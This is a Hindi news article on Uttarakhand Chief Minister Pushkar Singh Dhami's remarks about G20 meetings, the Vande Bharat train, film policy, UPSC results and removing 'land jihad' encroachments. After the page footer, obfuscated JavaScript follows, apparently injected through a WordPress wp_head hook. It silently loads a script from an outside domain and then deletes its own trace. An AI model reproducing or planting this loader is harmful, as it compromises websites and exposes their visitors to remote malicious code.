Saturday, July 27, 2024
spot_img

जी 20 की मेजबानी उत्तराखण्ड के लिए गौरव की बात है।

मुख्यमंत्री पुष्कर सिंह धामी ने प्रधानमंत्री नरेंद्र मोदी का धन्यवाद करते हुए कहा की प्रधानमंत्री की अध्यक्षता में भारत को जी 20 की अध्यक्षता करने का सौभाग्य प्राप्त हुआ और ऐसे समय पर जब पूरी दुनिया अर्थव्यवस्था से चरमरा गई थीं, ऐसे महत्वपूर्ण समय पर भारत कोल जी-20 की अध्यक्षता सौंपी गई है प्रधानमंत्री नरेंद्र मोदी की अध्यक्षता में पूरे देश में बैठकों का आयोजन किया जा रहा है पहले यह बैठक बड़े-बड़े स्थानों पर होती थी लेकिन देश के छोटे-छोटे राज्यों में इस बैठक का आयोजन किया जा रहा है उत्तराखंड में भी हमें जी-20 की तीन बैठक करने का सौभाग्य प्राप्त हुआ उत्तराखंड में तीनो बैठक होने के साथ ही यहां की संस्कृति और विशेषताएं हैं वो सारी व्यवस्थाएं विश्व के अंदर पहुंचेंगी ।

देहरादून से दिल्ली के लिए वंदे भारत एक्सप्रेस ट्रेन की शुरुआत होने जा रही है जिस पर मुख्यमंत्री पुष्कर सिंह धामी ने कहा नरेंद्र मोदी प्रधानमंत्री बनने के बाद चार धामों की सड़कें, ऑल वेदर रोड, ऋषिकेश कर्णप्रयाग रेल लाइन, स्मार्ट सिटी जैसे कई महत्वपूर्ण कार्य हो रहे है और सभी पर तेजी से कार्य हुआ है साथ ही 9 सालों में डेढ़ लाख करोड़ की योजनाएं भारत सरकार ने स्वीकृत की है उसी क्रम में वंदे भारत एक्सप्रेस 25 मई को प्रारंभ होने जा रही है जिसको देश के प्रधानमंत्री हरी झंडी दिखाकर रवाना करेंगे।

उत्तराखंड एक ऐसा राज्य है जहाँ फिल्म इंडस्ट्री को अगर सबसे अच्छा वातावरण कहीं मिल सकता है तो वह उत्तराखंड है और उनके प्रमोशन के लिए और भी नीतियां बना रहे हैं जिससे फिल्म इंडस्ट्री के लोग अधिक से अधिक संख्या में उत्तराखंड की ओर आये।

उत्तराखंड में यूपीएससी की परीक्षा को सफल करने वाले छात्र छात्राओं को उत्तराखंड के मुख्यमंत्री ने बधाई देते हुए कहा जिन बच्चों ने यूपीएससी में अच्छा स्थान प्राप्त किया है उन सब को मेरी ओर से बहुत सारी शुभकामनाएं ऐसे बच्चे आगे चलकर देश और प्रदेश का नाम रोशन करें और उन्नति की ओर देश और प्रदेश को लेकर चले साथ ही उत्तराखंड के मुख्यमंत्री ने लैंड जिहाद पर बोलते हुए कहा जितने भी अवैध निर्माण है सरकारी भूमि पर किये गए है उन सबको हटाया जाएगा। ओर ये अवैध निर्माण तब तक नही रुकेगा जब तक सरकारी भूमि से अतिक्रमण नही हट जाते।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>